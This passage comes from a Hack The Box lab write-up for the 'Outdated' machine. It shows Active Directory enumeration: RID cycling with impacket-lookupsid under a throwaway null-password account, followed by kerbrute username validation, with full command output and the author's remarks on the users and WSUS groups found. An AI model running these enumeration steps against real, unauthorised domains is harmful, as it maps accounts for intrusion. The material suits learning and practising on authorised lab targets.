RID Cycling


┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ impacket-lookupsid OUTDATED.HTB/blahblah@dc.outdated.htb 100000
Impacket v0.11.0 - Copyright 2023 Fortra
 
password:
[*] Brute forcing SIDs at dc.outdated.htb
[*] stringbinding ncacn_np:dc.outdated.htb[\pipe\lsarpc]
[*] domain sid is: S-1-5-21-4089647348-67660539-4016542185
498: OUTDATED\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: OUTDATED\Administrator (SidTypeUser)
501: OUTDATED\Guest (SidTypeUser)
502: OUTDATED\krbtgt (SidTypeUser)
512: OUTDATED\Domain Admins (SidTypeGroup)
513: OUTDATED\Domain Users (SidTypeGroup)
514: OUTDATED\Domain Guests (SidTypeGroup)
515: OUTDATED\Domain Computers (SidTypeGroup)
516: OUTDATED\Domain Controllers (SidTypeGroup)
517: OUTDATED\Cert Publishers (SidTypeAlias)
518: OUTDATED\Schema Admins (SidTypeGroup)
519: OUTDATED\Enterprise Admins (SidTypeGroup)
520: OUTDATED\Group Policy Creator Owners (SidTypeGroup)
521: OUTDATED\Read-only Domain Controllers (SidTypeGroup)
522: OUTDATED\Cloneable Domain Controllers (SidTypeGroup)
525: OUTDATED\Protected Users (SidTypeGroup)
526: OUTDATED\Key Admins (SidTypeGroup)
527: OUTDATED\Enterprise Key Admins (SidTypeGroup)
553: OUTDATED\RAS and IAS Servers (SidTypeAlias)
571: OUTDATED\Allowed RODC Password Replication Group (SidTypeAlias)
572: OUTDATED\Denied RODC Password Replication Group (SidTypeAlias)
1000: OUTDATED\WSUS Administrators (SidTypeAlias)
1001: OUTDATED\WSUS Reporters (SidTypeAlias)
1002: OUTDATED\DC$ (SidTypeUser)
1103: OUTDATED\DnsAdmins (SidTypeAlias)
1104: OUTDATED\DnsUpdateProxy (SidTypeGroup)
1105: OUTDATED\CLIENT$ (SidTypeUser)
1106: OUTDATED\btables (SidTypeUser)
1107: OUTDATED\ITStaff (SidTypeGroup)
1108: OUTDATED\sflowers (SidTypeUser)

Performing the RID cycling attack against the target SMB service with an arbitrary credential (blahblah, no password) found the following domain users:

  • administrator
  • DC$
  • CLIENT$
  • btables
  • sflowers

I will first validate these users

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ kerbrute userenum --dc dc.outdated.htb -d OUTDATED.HTB users.txt
 
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
 
Version: v1.0.3 (9dad6e1) - 01/03/24 - Ronnie Flathers @ropnop
 
2024/01/03 15:22:55 >  Using KDC(s):
2024/01/03 15:22:55 >   dc.outdated.htb:88
 
2024/01/03 15:22:55 >  [+] VALID USERNAME:       administrator@OUTDATED.HTB
2024/01/03 15:22:55 >  [+] VALID USERNAME:       DC$@OUTDATED.HTB
2024/01/03 15:22:55 >  [+] VALID USERNAME:       sflowers@OUTDATED.HTB
2024/01/03 15:22:55 >  [+] VALID USERNAME:       btables@OUTDATED.HTB
2024/01/03 15:22:55 >  [+] VALID USERNAME:       CLIENT$@OUTDATED.HTB
2024/01/03 15:22:55 >  Done! Tested 5 usernames (5 valid) in 0.029 

All 5 users have been validated against the target KDC.

Interestingly, both the CLIENT$ and sflowers users were initially found through the kerbrute brute-force attack earlier, and an additional measure was in development because the target domain appeared to use a naming convention, judging from the username of the sflowers user. However, it may not be worth going down the username enumeration path based on a suspected naming convention, considering that only 5 valid users were identified through the RID cycling attack above.

Additionally, the presence of SIDs with WSUS in their names (WSUS Administrators and WSUS Reporters) further suggests that the target domain has Windows Server Update Services (WSUS) installed.